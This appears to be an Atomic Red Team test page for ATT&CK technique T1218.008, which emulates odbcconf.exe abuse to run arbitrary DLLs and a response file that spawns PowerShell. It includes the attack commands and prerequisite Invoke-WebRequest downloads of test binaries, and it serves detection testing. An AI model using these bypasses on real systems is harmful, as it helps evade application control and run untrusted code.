T1218.008 - Signed Binary Proxy Execution: Odbcconf

Description from ATT&CK

Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) The Odbcconf.exe binary may be digitally signed by Microsoft. Adversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse. Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010), odbcconf.exe has a REGSVR flag that can be misused to execute DLLs (ex: odbcconf.exe /S /A {REGSVR "C:\Users\Public\file.dll"}). (Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017)

Atomic Tests


Atomic Test #1 - Odbcconf.exe - Execute Arbitrary DLL

Execute arbitrary DLL file stored locally.

Supported Platforms: Windows

auto_generated_guid: 2430498b-06c0-4b92-a448-8ad263c388e2

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | dll_payload | DLL to execute | path | PathToAtomicsFolder\T1218.008\src\Win32\T1218-2.dll|

Attack Commands: Run with 
1

command_prompt
!

odbcconf.exe /S /A {REGSVR "#{dll_payload}"}

Dependencies: Run with 
1

powershell
!

Description: T1218-2.dll must exist on disk at specified location (#{dll_payload})
Check Prereq Commands:
1

if (Test-Path "#{dll_payload}") {exit 0} else {exit 1}
Get Prereq Commands:
1
2

New-Item -Type Directory (split-path "#{dll_payload}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.008/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}"



Atomic Test #2 - Odbcconf.exe - Load Response File

Execute arbitrary response file that will spawn PowerShell.exe. Source files: https://github.com/woanware/application-restriction-bypasses

Supported Platforms: Windows

auto_generated_guid: 331ce274-f9c9-440b-9f8c-a1006e1fce0b

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | rsp_file_name | Response file name to load | string | T1218.008.rsp| | rsp_file_path | Response file path | string | PathToAtomicsFolder\T1218.008\bin\|

Attack Commands: Run with 
1

command_prompt
!

cd "#{rsp_file_path}"
odbcconf.exe -f "#{rsp_file_name}"

Dependencies: Run with 
1

powershell
!

Description: T1218.008.rsp must exist on disk at specified location (#{rsp_file_path}#{rsp_file_name})
Check Prereq Commands:
1

if (Test-Path "#{rsp_file_path}#{rsp_file_name}") {exit 0} else {exit 1}
Get Prereq Commands:
1
2

Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.008/bin/T1218.008.rsp" -OutFile "#{rsp_file_path}#{rsp_file_name}"
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.008/bin/o.dll" -OutFile "#{rsp_file_path}\o.dll"